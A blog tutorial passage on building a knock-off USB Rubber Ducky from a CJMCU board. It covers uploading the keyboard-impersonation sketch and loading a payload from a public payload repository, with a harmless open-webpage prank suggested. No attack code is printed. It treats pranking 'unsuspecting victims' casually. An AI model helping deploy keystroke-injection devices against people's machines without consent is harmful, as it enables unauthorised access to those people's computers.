Next you will need to copy the contents of the Duckduino-microSD.ino file into the Arduino sketch. Then use the upload button to push the new sketch to the CJMCU board. This is the functionality that allows the CJMCU to impersonate a keyboard. This is what allows it to act like the USB Rubber Ducky we all know and love. After a bit of time the upload will complete, and the device is almost ready to go. The only thing missing is a payload.

Loading the Payload

There is a huge repository of ducky payloads on the git hub repository https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Find the payload you want, I suggest starting with something easy like the Open Webpage, Any Platform payload. Copy the contents of the script to a text file and make the modifications to tailor it to your liking (may I suggest https://www.youtube.com/watch?v=oHg5SJYRHA0). Save it as script.txt or whatever you have set the String DEFAULT_FILE_NAME = “script.txt”; value to in the ino file uploaded to the CJMCU. Finally, copy the script.txt file over to your microsd using your microsd card reader. Your knock off USB Rubber Ducky is now ready to prank unsuspecting victims.

While the USB Rubber Ducky is primarily associated with hacking and penetration testing, it is a powerful automation tool that can be used for a wide range of tedious tasks. For instance, imagine if you needed to install software or make configuration changes on multiple air gapped machines. You could write a script that automates this process for you.

While you’re here why not check out some of my other articles. I am currently going through the Starting Point on Hack The Box and have write-ups for  ArchetypeOopsie, VaccineShieldPathfinderIncluded and Markup.